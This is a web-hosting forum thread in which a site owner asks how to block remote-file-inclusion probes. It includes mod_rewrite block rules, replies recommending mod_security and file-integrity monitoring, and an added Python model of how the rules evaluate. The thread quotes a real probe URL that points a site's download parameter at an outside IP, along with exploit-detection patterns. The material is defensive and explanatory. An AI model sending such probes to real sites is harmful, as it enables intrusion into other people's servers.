LinuxQuestions.org


angel115 01-19-2011 06:21 AM

How to Block attacks "http://213.246.61.125:2082/index.html?" and similar.
 
Hello there,

Today I've found several attempts to access the following URL on my website:
/index.php?file-download=http://213.246.61.125:2082/index.html?

After googling a bit it seems that in some cases, using this attack, the bad guy is able to change the code in some of your files.

It also seems to affect only a certain version of osCommerce.

I don't use osCommerce, so I do believe that I'm on the safe side, but it's not the first time that I've seen similar attack attempts on my website.

So to protect myself I was wondering if using .htaccess restrictions would be enough?

At the moment I'm using the following (which I found on another forum):
Code:

########## Begin - Rewrite rules to block out some common exploits
#
RewriteEngine on
Options +FollowSymLinks
#
# Block out any script trying to base64_encode
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block hackers trying a redirect via cPath
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR]
# Block attempt to redirect to /self
# (last condition: no [OR]; every condition above needs it, otherwise they are ANDed)
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC]
#
RewriteRule ^.* - [F]
#
########## End - Rewrite rules to block out some common exploits

But I do think that these rewrite strings are more specifically written to protect osCommerce sites.

Any advice on how to protect my website from such attacks and similar?

Best regards,
Angel.
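
Added example, not part of the original post or thread: a small Python model of how mod_rewrite chains `RewriteCond` lines like the ones above, run against the request quoted in the post. The `REMOTE_URL` condition, the sample query strings other than the first, and all helper names are assumptions made for illustration.

```python
import re

# RewriteCond patterns from the post above as (regex, flags); NC = ignore case,
# OR = "or this with the next condition". Every line but the last carries OR.
CONDS = [
    (r"base64_encode.*\(.*\)", {"OR"}),
    (r"(\<|%3C).*script.*(\>|%3E)", {"NC", "OR"}),
    (r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})", {"OR"}),
    (r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})", {"OR"}),
    (r"^(.*)cPath=http://(.*)$", {"NC", "OR"}),
    (r"^(.*)/self/(.*)$", {"NC"}),
]
# Same patterns with [OR] dropped from the last three lines, so they are ANDed.
AND_TAIL = CONDS[:3] + [(p, f - {"OR"}) for p, f in CONDS[3:]]
# Assumption, not from the thread: one more condition matching any parameter whose
# value starts with a remote URL, plain or percent-encoded (QUERY_STRING is raw).
REMOTE_URL = (r"=(https?|ftp)(:|%3A)(/|%2F){2}", {"NC"})
EXTENDED = [(p, f | {"OR"}) for p, f in CONDS] + [REMOTE_URL]


def rule_fires(conds, query_string):
    """Evaluate a RewriteCond chain as mod_rewrite does: conditions are ANDed,
    except that one flagged [OR] is ORed with the condition that follows it.
    Assumes the final condition has no [OR]."""
    i = 0
    while i < len(conds):
        group_ok = False
        while True:  # one OR-group: runs up to the first condition without OR
            pattern, flags = conds[i]
            if re.search(pattern, query_string, re.I if "NC" in flags else 0):
                group_ok = True
            i += 1
            if "OR" not in flags or i == len(conds):
                break
        if not group_ok:
            return False
    return True


# Constructed sample query strings; the first is the request quoted in the post.
SAMPLES = {
    "observed": "file-download=http://213.246.61.125:2082/index.html?",
    "encoded": "file-download=http%3A%2F%2Fexample.invalid%2Fx",
    "cpath": "cPath=http://example.invalid/",
    "benign": "page=2&sort=name",
}

if __name__ == "__main__":
    for name, qs in SAMPLES.items():
        print(name, [rule_fires(c, qs) for c in (CONDS, AND_TAIL, EXTENDED)])
```

The generic `REMOTE_URL` condition also matches legitimate parameters that carry a URL, such as return or redirect targets, so check what the application itself sends before turning it into a `RewriteCond`.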

GlennsPref 01-19-2011 06:51 AM

Hi, it's very easy to get concerned with possible breaches in your web security.

But warnings and errors in your logs are just that, warnings and errors.

If anything is done you will get "failed" messages.

Look again and see if that is your problem.

Regards Glenn

Hangdog42 01-19-2011 07:49 AM

In addition to what Glenn suggested, you might want to consider some pre-emptive moves. Something like mod_security might not be a bad idea, and you might want to consider some active file monitoring like Aide or Samhain. However, for those to really be useful, you need to trust your current installation completely.

angel115 01-19-2011 08:37 AM

Thanks to you both.

I'll follow your recommendations.

PS Hangdog42: I have to check, but I think I already enabled "mod_security"

Thanks,
Angel.

angel115 01-19-2011 12:28 PM

I've found a fairly good resource on the Symantec website on how to use .htaccess in an efficient way:
http://www.symantec.com/connect/arti...ccess-part-one

GlennsPref 01-19-2011 02:19 PM

Hi, just another thought, I used tutes similar to and including this Magazine article to get my system ironed out.

Keeping Your Linux System Secure
ref. http://www.linux.org/lessons/advanced/x313.html

Cheers and all the best, Glenn


All times are GMT -5.